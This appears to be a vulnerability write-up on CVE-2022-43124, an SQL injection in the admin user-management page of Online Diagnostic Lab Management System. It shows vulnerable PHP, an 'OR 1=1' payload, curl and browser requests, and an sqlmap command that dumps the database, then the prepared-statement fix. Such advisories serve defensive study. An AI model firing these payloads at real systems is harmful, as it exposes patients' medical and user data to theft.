---

Online Diagnostic Lab Management System v1. might sound like a secure way to handle medical records and diagnostics, but in late 2022, it was found vulnerable to a rather basic SQL Injection bug. CVE-2022-43124 allows an attacker to bypass security by targeting the id parameter in a specific admin page. In this article, we'll break down how this vulnerability works, show a sample exploit, and reference the original sources.

What Is SQL Injection Anyway?

SQL Injection (SQLi) is a web security vulnerability that allows attackers to interfere with the queries an application makes to its database. By manipulating the input, adversaries bypass authentication, view sensitive data, or even modify/deleting records — all without valid access.

In Online Diagnostic Lab Management System v1., an administrative web interface lives at

/admin/?page=user/manage_user&id=<user-input>

The id parameter isn't properly sanitized or checked. This lets attackers input SQL code instead of a harmless user ID.

The Exploit Details

How does it work?

Suppose the backend code looks something like this (example in PHP)

<?php
// Vulnerable code (simplified)
$id = $_GET['id'];
$query = "SELECT * FROM users WHERE id = '$id'";
$result = mysqli_query($conn, $query);
?>

If an attacker sets id=1' OR 1=1 --, the query becomes

SELECT * FROM users WHERE id = '1' OR 1=1 -- '

The OR 1=1 always evaluates true. The -- marks the rest as a comment, ignoring what's after. This could leak other users' data or give wider access.

A browser or command-line tool like curl is enough to test the vulnerability

curl "http://targetsite/admin/?page=user/manage_user&id=1'%20OR%201=1--";

Or, visit in your browser

http://targetsite/admin/?page=user/manage_user&id=1' OR 1=1--

You may see the table displaying more users than just the one with ID = 1… or even all users.

Tools like sqlmap automate this with a command like

sqlmap -u "http://targetsite/admin/?page=user/manage_user&id=1"; --cookie="admin_sessid=..." --risk=3 --level=5 --dump

Example (safe PHP with prepared statements)

$stmt = $conn->prepare('SELECT * FROM users WHERE id = ?');
$stmt->bind_param('i', $_GET['id']);
$stmt->execute();

References

- Exploit Database: CVE-2022-43124
- NVD - CVE-2022-43124 entry
- OWASP - SQL Injection

Final Word

Sometimes, old vulnerabilities still reappear in new software. CVE-2022-43124 is a classic reminder: never trust user input, especially in critical apps like diagnostic lab systems. If you run this application, patch immediately or mitigate exposures.

Timeline

Published on: 11/01/2022 14:15:00 UTC
Last modified on: 11/01/2022 23:33:00 UTC